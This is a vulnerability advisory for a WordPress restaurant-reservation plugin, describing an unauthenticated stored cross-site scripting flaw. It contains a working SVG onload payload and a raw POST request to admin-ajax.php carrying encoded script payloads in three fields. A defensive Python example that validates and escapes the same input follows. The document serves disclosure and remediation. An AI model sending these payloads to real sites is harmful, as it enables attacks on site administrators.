wpexploit | Bastijn Ouwendijk | WPEX-ID: 3C6CC46E-E18A-4F34-AC09-F30CA74A1182
History: Sep 06, 2022 - 12:00 a.m.

Ketchup Restaurant Reservations <= 1.0.0 - Unauthenticated Stored XSS

Published: 2022-09-06 00:00:00
Author: Bastijn Ouwendijk
Tags: restaurant reservation, unauthenticated, stored xss, vulnerable fields, client-side validation, admin-ajax.php

EPSS: 0.001 (Percentile: 45.7%)

The plugin does not sanitise and escape some of the reservation user inputs, allowing unauthenticated attackers to perform Stored Cross-Site Scripting attacks against a logged-in admin who views the malicious reservation.

As an unauthenticated user, make a reservation (i.e. on a page where the [reservation_form] shortcode is embedded) and put the following payload in the Full Name field: a a"><svg/onload=alert(/XSS/)>

The Phone Number and Email fields are also vulnerable (they are only validated client-side), as the following request sent directly to admin-ajax.php shows:

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 428
Connection: close

action=kechup_rr_bookings_interact&validation_key=680bed9c59&operation=create&data=%5b%225%22%2c%2211%22%2c%2211%3a11%22%2c%2213%3a11%3a00%22%2c%222022-08-07%22%2c%22%3cscript%3ealert(%5c%22Stored%20XSS%20full%20name%5c%22)%3c%2fscript%3e%22%2c%22%3cscript%3ealert(%5c%22Stored%20XSS%20mail%5c%22)%3c%2fscript%3e%22%2c%222%22%2c%22%3cscript%3ealert(%5c%22Stored%20XSS%20phone%20number%5c%22)%3c%2fscript%3e%22%2c%22pending%22%5d
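Added example (not code from the advisory or the plugin): it decodes the captured request body above, pulls out the three user-controlled fields, and applies the server-side validation and output escaping that would have neutralised the payloads. The positional layout of the `data` array (index 5 = full name, 6 = email, 8 = phone) is an assumption inferred from the alert() messages in the captured payload.

```python
"""Server-side handling that the plugin relied on the browser to do.
Added example; the field indices into `data` are assumed, not documented."""
import html
import json
import re
from urllib.parse import parse_qs

# Request body captured in the advisory (application/x-www-form-urlencoded).
CAPTURED_BODY = (
    "action=kechup_rr_bookings_interact&validation_key=680bed9c59&operation=create"
    "&data=%5b%225%22%2c%2211%22%2c%2211%3a11%22%2c%2213%3a11%3a00%22%2c%222022-08-07%22"
    "%2c%22%3cscript%3ealert(%5c%22Stored%20XSS%20full%20name%5c%22)%3c%2fscript%3e%22"
    "%2c%22%3cscript%3ealert(%5c%22Stored%20XSS%20mail%5c%22)%3c%2fscript%3e%22%2c%222%22"
    "%2c%22%3cscript%3ealert(%5c%22Stored%20XSS%20phone%20number%5c%22)%3c%2fscript%3e%22"
    "%2c%22pending%22%5d"
)

NAME_IDX, EMAIL_IDX, PHONE_IDX = 5, 6, 8  # assumed positions (see docstring)

# Strict allow-lists: none of them admit '<', '>' or quotes.
NAME_RE = re.compile(r"^[\w .'-]{1,100}$")
EMAIL_RE = re.compile(r"^[^@\s<>\"']+@[^@\s<>\"']+\.[A-Za-z]{2,}$")
PHONE_RE = re.compile(r"^\+?[0-9 ()-]{6,20}$")


def parse_reservation(body: str) -> dict:
    """Decode the form body and the JSON `data` array into the three fields."""
    fields = json.loads(parse_qs(body)["data"][0])
    return {"name": fields[NAME_IDX], "email": fields[EMAIL_IDX], "phone": fields[PHONE_IDX]}


def validate_server_side(reservation: dict) -> list:
    """Return the names of fields that fail validation on the server.

    Client-side checks are irrelevant here: the attacker posts the request
    directly to admin-ajax.php and never runs the page's JavaScript."""
    checks = {"name": NAME_RE, "email": EMAIL_RE, "phone": PHONE_RE}
    return [field for field, rx in checks.items() if not rx.fullmatch(reservation[field])]


def render_for_admin(value: str) -> str:
    """Escape on output for the admin view, independent of validation (defence in depth)."""
    return html.escape(value, quote=True)
```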
